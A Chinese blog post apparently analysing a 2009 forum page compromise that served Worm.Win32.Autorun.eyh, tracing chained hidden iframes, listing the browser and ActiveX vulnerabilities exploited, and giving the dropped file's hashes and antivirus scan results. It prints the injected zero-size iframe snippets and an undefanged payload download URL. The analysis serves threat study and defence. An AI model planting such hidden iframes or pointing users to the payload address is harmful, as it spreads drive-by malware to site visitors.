某论坛挂马Worm.Win32.Autorun.eyh

某论坛挂马Worm.Win32.Autorun.eyh

论坛网页包含代码:
/---
<iframe width='0' height='0' src='hxxp://www.5**4*z**c.cn/1**7aq/q.js'></iframe>
---/

hxxp://www.5**4*z**c.cn/1**7aq/q.js
输出代码:
/---
<IFRaME src="hxxp://m**.sf*s3**wws.cn/03/x4.htm" width=1 height=0></IFRAME>

hxxp://m**.sf*s3**wws.cn/03/x4.htm
包含代码:
/---
<iframe src=google.htm width=100 height=0></Iframe>
---/

hxxp://m**.sf*s3**wws.cn/03/google.htm
采用了一种先前没见过的加密方法,开头一段代码为:
/---
<hTmL><hEaD><Meta Name=Encoder Content=HTMLSHIP>
---/

其功能是:检测浏览器软件类型,如果是IE浏览器,则显示ie.swf,否则显示ff.swf;然后输出代码:
/---
<iframe src=all.htm width=100 height=0></iframe>
---/

hxxp://m**.sf*s3**wws.cn/03/all.htm

采用了相同的加密方法:
用<iframe>引入下列网页,利用漏洞下载hxxp://d1.csygg.com/01/g.exe:

1.htm

利用MS-06014漏洞

kdosn.htm
利用Qvod Player 播放器(clsid:F3D0D36F-23F8-4682-A195-74C92B03D4AF)漏洞

kc.htm
利用Baidu工具条(cLSiD:{A7F05EE4-0426-454F-8013-C41E3596E9E9})漏洞下载hxxp://d1.csygg.com/01/Baidu.cab

newlz.htm
利用联众(GLIEDown.IEDown.1,clsid:F917534D-535B-416B-8E8F-0C04756C31A8)漏洞

s.htm
利用新浪(Downloader.DLoader.1,clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A)漏洞

office.htm
利用MS Office(snpvw.Snapshot Viewer Control.1)漏洞

bf.htm
利用暴风影音(MPS.StormPlayer,)漏洞

cx.htm
利用超星阅览器(Pdg2)漏洞

uu.htm
UUSEE网络电视(UUUPGRADE.UUUpgradeCtrl.1)漏洞

2.htm
利用联众世界(HanGamePluginCn18.HanGamePluginCn18.1)漏洞

3.htm
4.htm
利用RealPlayer(IERPCtl.IERPCtl.1)漏洞

0.htm
利用(clsid:19EFFC12-25FB-479A-A0F2-1569AE1B3365)漏洞

5.htm
利用MS09-002 漏洞


文件说明符 : D:/test/g.exe
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2009-3-23 22:38:20
修改时间 : 2009-3-23 22:38:20
大小 : 25696 字节 25.96 KB
MD5 : cae3e537b9d4495d31af6c360cb31dee
SHA1: 76877278EF76318E4A025ADC9B9FEC8CF8C7D30C
CRC32: 3ee9304b

 

反病毒引擎版本最后更新扫描结果
a-squared4.0.0.1012009.03.23Win32.Warezov!IK
AhnLab-V35.0.0.22009.03.23Packed/Upack
AntiVir7.9.0.1202009.03.23TR/Crypt.UPKM.Gen
Authentium5.1.2.42009.03.23W32/SYStroj.N.gen!Eldorado
Avast4.8.1335.02009.03.23-
AVG8.5.0.2832009.03.23Rootkit-Agent.BN
BitDefender7.22009.03.23Generic.Malware.SP!BPk!Tkg.BE60B47D
CAT-QuickHeal10.002009.03.23-
ClamAV0.94.12009.03.23Worm.Mytob-73
Comodo10822009.03.23-
DrWeb4.44.0.091702009.03.23DLOADER.Trojan
eSafe7.0.17.02009.03.23Win32.Looked.gen
eTrust-Vet31.6.64122009.03.23-
F-Prot4.4.4.562009.03.23W32/SYStroj.N.gen!Eldorado
F-Secure8.0.14470.02009.03.23Trojan.Win32.Agent2.gcy
Fortinet3.117.0.02009.03.23-
GData192009.03.23Generic.Malware.SP!BPk!Tkg.BE60B47D
IkarusT3.1.1.48.02009.03.23Win32.Warezov
K7AntiVirus7.10.6782009.03.21Generic.Packed.Upack-1
Kaspersky7.0.0.1252009.03.23Trojan.Win32.Agent2.gcy
McAfee55612009.03.22-
McAfee+Artemis55612009.03.22New Malware.f
McAfee-GW-Edition6.7.62009.03.23Trojan.Crypt.UPKM.Gen
Microsoft1.45022009.03.23-
NOD3239532009.03.21-
Norman6.00.062009.03.23W32/Suspicious_U.gen
nProtect2009.1.8.02009.03.23-
Panda10.0.0.102009.03.22-
PCTools4.4.2.02009.03.23Packed/Upack
Prevx1V22009.03.23High Risk Worm
Rising21.22.02.002009.03.23Worm.Win32.Autorun.eyh
Sophos4.39.02009.03.23Mal/Packer
Sunbelt3.2.1858.22009.03.22-
Symantec1.4.4.122009.03.23Trojan.KillAV
TheHacker6.3.3.4.2872009.03.23-
TrendMicro8.700.0.10042009.03.23Cryp_Upack
VBA323.12.10.12009.03.23-
ViRobot2009.3.23.16602009.03.23-
VirusBuster4.6.5.02009.03.22Packed/Upack
附加信息
File size: 25696 bytes
MD5...: cae3e537b9d4495d31af6c360cb31dee
SHA1..: 76877278ef76318e4a025adc9b9fec8cf8c7d30c
SHA256: 84eb838fb8ef8c3579f1f6121e06e78a6de2a545597e6326d6bea5b82538969c
SHA512: e49b97f98091ab44e4e89152db963aba30fa671238d735efca538659bb970550<BR>9e01a6f8ee94e4f44ee5a8603bf90b8c733ad7d0c88ca4267a18d27178feab0d
ssdeep: 384:B5JocoN1ffccInU9mgG0Hy+QVMf6mFJt6UnHQJNX8Cw02igc8TElAlVr7l:B<BR>4co7YkJvxFJC7n2igPTElAvr<BR>
PEiD..: Upack 0.24 - 0.27 beta / 0.28 alpha -&gt; Dwing
TrID..: File type identification<BR>DOS Executable Generic (100.0%)
PEInfo: PE Structure information<BR><BR>( base data )<BR>entrypointaddress.: 0x1efe3<BR>timedatestamp.....: 0x0 (Thu Jan 01 00:00:00 1970)<BR>machinetype.......: 0x14c (I386)<BR><BR>( 2 sections )<BR>name viradd virsiz rawdsiz ntrpy md5<BR>.Upack 0x1000 0x18000 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e<BR>.rsrc 0x19000 0xe000 0x6260 7.98 88e69c0ef43413739c008ef9e7337308<BR><BR>( 1 imports ) <BR>&gt; KERNEL32.DLL: LoadLibraryA, GetProcAddress<BR><BR>( 0 exports ) <BR>
Prevx info: &lt;a href='http://info.prevx.com/aboutprogramtext.asp?PX5=2480BFFB6039EC60640200DBB987A400C935BB45' target='_blank'&gt;http://info.prevx.com/aboutprogramtext.asp?PX5=2480BFFB6039EC60640200DBB987A400C935BB45&lt;/a&gt;
packers (Kaspersky): UPack
packers (Authentium): embedded
packers (F-Prot): embedded

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

紫郢剑侠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值